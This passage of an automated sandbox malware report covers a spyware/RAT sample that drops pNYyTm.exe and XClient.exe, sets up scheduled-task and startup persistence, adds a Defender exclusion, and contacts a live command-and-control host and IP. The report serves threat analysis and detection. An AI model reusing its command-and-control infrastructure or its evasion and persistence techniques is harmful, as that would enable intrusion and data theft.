                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Users\user\AppData\Roaming\pNYyTm.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Users\user\AppData\Roaming\pNYyTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3722141576.0000000000C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.33e2d7c.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.33e2d7c.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 8096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pNYyTm.exe PID: 8164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pNYyTm.exe PID: 1132, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.33e2d7c.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.33e2d7c.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 8096, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pNYyTm.exe PID: 8164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pNYyTm.exe PID: 1132, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Masquerading
                1
                Input Capture
                221
                Security Software Discovery
                Remote Services1
                Input Capture
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job
                2
                Registry Run Keys / Startup Folder
                1
                Scheduled Task/Job
                11
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading
                2
                Registry Run Keys / Startup Folder
                131
                Virtualization/Sandbox Evasion
                Security Account Manager131
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Clipboard Data
                1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading
                111
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture11
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1475711 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 18/07/2024 Architecture: WINDOWS Score: 100 51 moneymaker-30608.portmap.host 2->51 57 Snort IDS alert for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 16 other signatures 2->63 8 SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe 7 2->8         started        12 pNYyTm.exe 5 2->12         started        signatures3 process4 file5 41 C:\Users\user\AppData\Roaming\pNYyTm.exe, PE32 8->41 dropped 43 C:\Users\user\...\pNYyTm.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmp496E.tmp, XML 8->45 dropped 47 SecuriteInfo.com.W....1456.22106.exe.log, ASCII 8->47 dropped 65 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 8->67 69 Adds a directory exclusion to Windows Defender 8->69 14 SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe 6 8->14         started        18 powershell.exe 22 8->18         started        21 powershell.exe 22 8->21         started        23 schtasks.exe 1 8->23         started        71 Multi AV Scanner detection for dropped file 12->71 73 Machine Learning detection for dropped file 12->73 75 Injects a PE file into a foreign processes 12->75 25 schtasks.exe 12->25         started        27 pNYyTm.exe 12->27         started        signatures6 process7 dnsIp8 53 moneymaker-30608.portmap.host 193.161.193.99, 30608, 49708 BITREE-ASRU Russian Federation 14->53 49 C:\Users\user\AppData\Roaming\XClient.exe, PE32 14->49 dropped 55 Loading BitLocker PowerShell Module 18->55 29 conhost.exe 18->29         started        31 WmiPrvSE.exe 18->31         started        33 conhost.exe 18->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        39 conhost.exe 25->39         started        file9 signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe36%VirustotalBrowse
                SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\pNYyTm.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\XClient.exe34%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                C:\Users\user\AppData\Roaming\pNYyTm.exe34%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                moneymaker-30608.portmap.host100%Avira URL Cloudphishing
                NameIPActiveMaliciousAntivirus DetectionReputation
                moneymaker-30608.portmap.host
                193.161.193.99
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  moneymaker-30608.portmap.hosttrue
                  • Avira URL Cloud: phishing
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, pNYyTm.exe, 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  193.161.193.99
                  moneymaker-30608.portmap.hostRussian Federation
                  198134BITREE-ASRUtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1475711
                  Start date and time:2024-07-18 08:34:15 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 30s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@20/18@1/1
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 152
                  • Number of non-executed functions: 2
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target pNYyTm.exe, PID 1132 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  02:35:05API Interceptor9852435x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe modified
                  02:35:09API Interceptor31x Sleep call for process: powershell.exe modified
                  02:35:11API Interceptor1x Sleep call for process: pNYyTm.exe modified
                  08:35:10Task SchedulerRun new task: pNYyTm path: C:\Users\user\AppData\Roaming\pNYyTm.exe
                  08:35:16AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                  • okmaq-24505.portmap.host:24505/
                  JnBNepHH7K.exeGet hashmaliciousAsyncRAT RedLineBrowse
                  • exara32-64703.portmap.host:64703/
                  99SKW728vf.exeGet hashmaliciousRedLineBrowse
                  • lottie9nwtina-55339.portmap.host:55339/
                  amazoninvoiceAF0388d83739dee83479171dbcf.exeGet hashmaliciousRedLineBrowse
                  • tete2792-22120.portmap.host:22120//
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  moneymaker-30608.portmap.hostSecuriteInfo.com.Win32.RATX-gen.31110.7671.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  BITREE-ASRUSecuriteInfo.com.Win32.RATX-gen.31110.7671.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  0aXmWlKxOj.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  DriverUpdt.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  password.exeGet hashmaliciousSugarDump, XWormBrowse
                  • 193.161.193.99
                  Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbeGet hashmaliciousStormKitty, XWormBrowse
                  • 193.161.193.99
                  9Ok3QP5FFV.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                  • 193.161.193.99
                  Client.exeGet hashmaliciousQuasarBrowse
                  • 193.161.193.99
                  siuu.exeGet hashmaliciousXWormBrowse
                  • 193.161.193.99
                  y0w04xGM45.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                  • 193.161.193.99
                  No context
                  No context
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:true
                  Reputation:high, very likely benign file
